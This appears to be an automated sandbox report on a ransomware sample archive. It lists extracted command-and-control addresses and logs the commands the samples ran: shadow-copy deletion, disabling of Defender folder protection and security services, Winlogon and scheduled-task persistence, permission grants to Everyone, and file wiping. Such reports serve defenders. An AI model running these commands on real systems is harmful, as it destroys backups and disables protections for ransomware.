Analysis
-
max time kernel
96s -
max time network
168s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
07-10-2024 19:37
General
-
Target
RNSM00466.7z
-
Size
83.9MB
-
MD5
add9b95cfef4f7b5e89946205f16a572
-
SHA1
077667fb23e0b48936714b8d4a54f162203a934a
-
SHA256
133c0ba06c58e2b694c42135545d7554b3d6e37ad752bd6a3fa97b5577cd6033
-
SHA512
8e69d5e07614b498e3ddc2bb4ce79b734dd215e75dfa72dabb6e138f2e50824975e7af86302d15c988022217968cbb45937d663612640d0025fa25b44570a364
-
SSDEEP
1572864:yXbfmaPS2DP0IVADQh/BX6xJWyoszrxhh/R88bfax/XOc:+bfmrq/hpqLoszrFR12xX7
Malware Config
Extracted
gandcrab
http://gdcbghvjyqy7jclk.onion.top/
Extracted
darkcomet
pc
host12365485454.ddns.net:1604
192.168.0.125:1604
DC_MUTEX-Q8QDW8F
-
InstallPath
MSDCSC\msdcsc.exe
-
gencode
locQi1ySlvoS
-
install
true
-
offline_keylogger
true
-
persistence
true
-
reg_key
micro update
Extracted
nullmixer
http://motiwa.xyz/
Extracted
redline
Cana
176.111.174.254:56328
Extracted
redline
DomAni2
flestriche.xyz:80
Extracted
C:\ProgramData\Package Cache\{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}v14.30.30704\packages\vcRuntimeMinimum_x86\HowToRestoreMyFiles.txt
Extracted
\Device\HarddiskVolume1\Read_Me!_.txt
Signatures
-
Darkcomet
DarkComet is a remote access trojan (RAT) developed by Jean-Pierre Lesueur.
-
Detect LockFile payload 1 IoCs
-
Detect MafiaWare666 ransomware 2 IoCs
-
Disables service(s) 3 TTPs
-
GandCrab payload 4 IoCs
-
Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
-
LockFile
LockFile is a new ransomware that emerged in July 2021 with ProxyShell vulnerabilties.
-
MafiaWare666 Ransomware
MafiaWare666 is ransomware written in C# with multiple variants.
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
-
Modifies firewall policy service 3 TTPs 6 IoCs
-
Modifies security service 2 TTPs 2 IoCs
-
NullMixer
NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
-
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
-
SectopRAT payload 3 IoCs
-
Windows security bypass 2 TTPs 4 IoCs
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
-
Disables RegEdit via registry modification 2 IoCs
-
Modifies Windows Firewall 2 TTPs 5 IoCs
-
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
ASPack v2.12-2.42 2 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 3 IoCs
-
Executes dropped EXE 25 IoCs
-
Loads dropped DLL 2 IoCs
-
Modifies file permissions 1 TTPs 4 IoCs
-
Obfuscated with Agile.Net obfuscator 2 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
-
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Windows security modification 2 TTPs 4 IoCs
-
Adds Run key to start application 2 TTPs 8 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Drops desktop.ini file(s) 1 IoCs
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
-
Looks up external IP address via web service 14 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Program crash 5 IoCs
-
Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
-
Suspicious use of SetThreadContext 5 IoCs
-
UPX packed file 27 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 48 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 35 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 42 IoCs
-
Modifies registry class 4 IoCs
-
Modifies registry key 1 TTPs 3 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 6 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 4 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00466.7z1⤵
- Modifies registry class
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00466.7z"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.MSIL.Blocker.gen-1d782dec1452bd53c9362bc4c4a0a09d7585e728d1bf10556ae1ed9cd195bd72.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-1d782dec1452bd53c9362bc4c4a0a09d7585e728d1bf10556ae1ed9cd195bd72.exe3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5d1c8eb7795ec2c5bfc7d1bca5f3b23887d1e264554d55f1c98858033a32973f.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-5d1c8eb7795ec2c5bfc7d1bca5f3b23887d1e264554d55f1c98858033a32973f.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Roaming\MAINPROC.exe"C:\Users\Admin\AppData\Roaming\MAINPROC.exe"4⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"6⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\SMSS.exe"C:\Users\Admin\AppData\Local\Temp\SMSS.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\SMSS.exe"C:\Users\Admin\AppData\Local\Temp\SMSS.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\MAINPROC.exe"C:\Users\Admin\AppData\Roaming\MAINPROC.exe"7⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"6⤵
-
-
-
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.MSIL.Blocker.gen-662c66c5f4687bb2537e99aed7b4911caa4a7ce083023171b3725e6379bc137d.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-662c66c5f4687bb2537e99aed7b4911caa4a7ce083023171b3725e6379bc137d.exe3⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 5; Remove-Item -Path "C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.MSIL.Blocker.gen-662c66c5f4687bb2537e99aed7b4911caa4a7ce083023171b3725e6379bc137d.exe" -Force4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Blocker.gen-662c66c5f4687bb2537e99aed7b4911caa4a7ce083023171b3725e6379bc137d.exeC:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Blocker.gen-662c66c5f4687bb2537e99aed7b4911caa4a7ce083023171b3725e6379bc137d.exe4⤵
-
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.MSIL.Gen.gen-bc71673003e3f83761875c04ccbefc29e92cf94bb402037ca03476a527790196.exeHEUR-Trojan-Ransom.MSIL.Gen.gen-bc71673003e3f83761875c04ccbefc29e92cf94bb402037ca03476a527790196.exe3⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.MSIL.Posh.gen-ca9a834fba508a7c018011d1f72eeca5f2c828767223c1609c0076d32980c720.exeHEUR-Trojan-Ransom.MSIL.Posh.gen-ca9a834fba508a7c018011d1f72eeca5f2c828767223c1609c0076d32980c720.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Blocker.pef-b543bd1e583a337e8756c6cbcc881f552ae4ea6a1571d95def47b3ab2cdce608.exeHEUR-Trojan-Ransom.Win32.Blocker.pef-b543bd1e583a337e8756c6cbcc881f552ae4ea6a1571d95def47b3ab2cdce608.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-3219d6a14f6c43b7221392c145b2dca4a091a101fea05bc487c34de66f871e27.exeHEUR-Trojan-Ransom.Win32.Crypmodadv.vho-3219d6a14f6c43b7221392c145b2dca4a091a101fea05bc487c34de66f871e27.exe3⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-d7e443c0904c997bf54c44d8e2cb57f1b6e9e8e9243bb8f754c74e595cd9067f.exeHEUR-Trojan-Ransom.Win32.Cryptoff.vho-d7e443c0904c997bf54c44d8e2cb57f1b6e9e8e9243bb8f754c74e595cd9067f.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-f6b1f19443119dbc4006a4a0bafc8d8111441f285afc5630b412726889275992.exeHEUR-Trojan-Ransom.Win32.GandCrypt.gen-f6b1f19443119dbc4006a4a0bafc8d8111441f285afc5630b412726889275992.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 4804⤵
- Program crash
-
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-58988a119a477326ec0a3ce03b6ab919e6d98ba634c50516ca2c11537dde9138.exeHEUR-Trojan-Ransom.Win32.GandCrypt.pef-58988a119a477326ec0a3ce03b6ab919e6d98ba634c50516ca2c11537dde9138.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\nslookup.exenslookup nomoreransom.bit dns1.soprodns.ru4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\nslookup.exenslookup emsisoft.bit dns1.soprodns.ru4⤵
-
-
C:\Windows\SysWOW64\nslookup.exenslookup gandcrab.bit dns1.soprodns.ru4⤵
-
-
C:\Windows\SysWOW64\nslookup.exenslookup nomoreransom.bit dns1.soprodns.ru4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
-
C:\Windows\SysWOW64\nslookup.exenslookup emsisoft.bit dns1.soprodns.ru4⤵
-
-
C:\Windows\SysWOW64\nslookup.exenslookup gandcrab.bit dns1.soprodns.ru4⤵
-
-
C:\Windows\SysWOW64\nslookup.exenslookup nomoreransom.bit dns1.soprodns.ru4⤵
-
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Generic-075c9f1b94d9379b0fe799f2aee76605941cc7d0871e4f16c736b96b4a87b8dd.exeHEUR-Trojan-Ransom.Win32.Generic-075c9f1b94d9379b0fe799f2aee76605941cc7d0871e4f16c736b96b4a87b8dd.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Generic-1c4c04a2930190aac571a48fc1c0bba239f769b009d2132f3083799291d173d2.exeHEUR-Trojan-Ransom.Win32.Generic-1c4c04a2930190aac571a48fc1c0bba239f769b009d2132f3083799291d173d2.exe3⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /F /IM Raccine.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /F /IM RaccineSettings.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /DELETE /TN "Raccine Rules Updater" /F4⤵
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config SQLTELEMETRY start= disabled4⤵
- Launches sc.exe
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-CimInstance Win32_ShadowCopy | Remove-CimInstance4⤵
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled4⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config SQLWriter start= disabled4⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config SstpSvc start= disabled4⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config MBAMService start= disabled4⤵
- Launches sc.exe
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin4⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q D:\\$Recycle.bin4⤵
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config Dnscache start= auto4⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config fdPHost start= auto4⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config FDResPub start= auto4⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config SSDPSRV start= auto4⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config upnphost start= auto4⤵
- Launches sc.exe
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="Network Discovery" new enable=Yes4⤵
- Modifies Windows Firewall
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes4⤵
- Modifies Windows Firewall
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol4⤵
-
C:\Users\Admin\AppData\Local\Temp\FF90D57B-7B58-420C-A1F8-28E6D240A009\dismhost.exeC:\Users\Admin\AppData\Local\Temp\FF90D57B-7B58-420C-A1F8-28E6D240A009\dismhost.exe {7447A9F1-0624-41A4-A5B1-B2B0A33917C3}5⤵
-
-
-
C:\Windows\SYSTEM32\mountvol.exe"mountvol.exe"4⤵
-
-
C:\Windows\System32\mountvol.exe"C:\Windows\System32\mountvol.exe" A: \\?\Volume{f9c79713-0000-0000-0000-100000000000}\4⤵
-
-
C:\Windows\System32\mountvol.exe"C:\Windows\System32\mountvol.exe" B: \\?\Volume{f9c79713-0000-0000-0000-d01200000000}\4⤵
-
-
C:\Windows\System32\mountvol.exe"C:\Windows\System32\mountvol.exe" E: \\?\Volume{f9c79713-0000-0000-0000-f0ff3a000000}\4⤵
-
-
C:\Windows\System32\mountvol.exe"C:\Windows\System32\mountvol.exe" G: \\?\Volume{06ef8add-84ce-11ef-b9c1-806e6f6e6963}\4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:*" /grant Everyone:F /T /C /Q4⤵
- Modifies file permissions
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "D:*" /grant Everyone:F /T /C /Q4⤵
- Modifies file permissions
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "Z:*" /grant Everyone:F /T /C /Q4⤵
- Modifies file permissions
-
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HowToRestoreMyFiles.txt4⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c shutdown /s /t 54⤵
-
C:\Windows\system32\shutdown.exeshutdown /s /t 55⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”4⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 35⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”5⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Generic-1c4c04a2930190aac571a48fc1c0bba239f769b009d2132f3083799291d173d2.exe4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵
-
-
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Generic-6fa73224f2f164fc88fb703eaa71d2be8f044eb8662d6100de682dc6871a7236.exeHEUR-Trojan-Ransom.Win32.Generic-6fa73224f2f164fc88fb703eaa71d2be8f044eb8662d6100de682dc6871a7236.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Generic-6fa73224f2f164fc88fb703eaa71d2be8f044eb8662d6100de682dc6871a7236.exeHEUR-Trojan-Ransom.Win32.Generic-6fa73224f2f164fc88fb703eaa71d2be8f044eb8662d6100de682dc6871a7236.exe4⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Generic-6fa73224f2f164fc88fb703eaa71d2be8f044eb8662d6100de682dc6871a7236.exe" +s +h5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Generic-6fa73224f2f164fc88fb703eaa71d2be8f044eb8662d6100de682dc6871a7236.exe" +s +h6⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\Desktop\00466" +s +h5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\Desktop\00466" +s +h6⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exe"C:\Users\Admin\Documents\MSDCSC\msdcsc.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exe"C:\Users\Admin\Documents\MSDCSC\msdcsc.exe"6⤵
- Modifies firewall policy service
- Modifies security service
- Windows security bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"7⤵
- System Location Discovery: System Language Discovery
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"8⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2356 -s 3768⤵
- Program crash
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Generic-77a825de2426a199fffbd178d67e8282ff63a037c96cbd1c1ebe5913ec4d1a9e.exeHEUR-Trojan-Ransom.Win32.Generic-77a825de2426a199fffbd178d67e8282ff63a037c96cbd1c1ebe5913ec4d1a9e.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Desktop\00466\HEUR-Trojan-Ransom.Win32.Generic-91a66df8eaf8bc989c0e1a296b4bc5c578ceb8bcaf3d256d609480535def3da9.exeHEUR-Trojan-Ransom.Win32.Generic-91a66df8eaf8bc989c0e1a296b4bc5c578ceb8bcaf3d256d609480535def3da9.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\tasklist.exetasklist /v /fo csv5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\findstr.exefindstr /i "dcdcf"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat4⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat6⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\h4_svc.bat" "6⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /v7⤵
- Enumerates processes with tasklist
-
-
C:\Windows\SysWOW64\find.exefind /I /c "dcdcf"7⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak7⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq HEUR-Trojan-Ransom.Win32.Generic-91a66df8eaf8bc989c0e1a296b4bc5c578ceb8bcaf3d256d609480535def3da9.exe" /fo csv7⤵
- Enumerates processes with tasklist
-
-
C:\Windows\SysWOW64\find.exefind /I "HEUR-Trojan-Ransom.Win32.Generic-91a66df8eaf8bc989c0e1a296b4bc5c578ceb8bcaf3d256d609480535def3da9.exe"7⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com4⤵
-
C:\Windows\SysWOW64\nslookup.exenslookup myip.opendns.com. resolver1.opendns.com5⤵
-
-
-
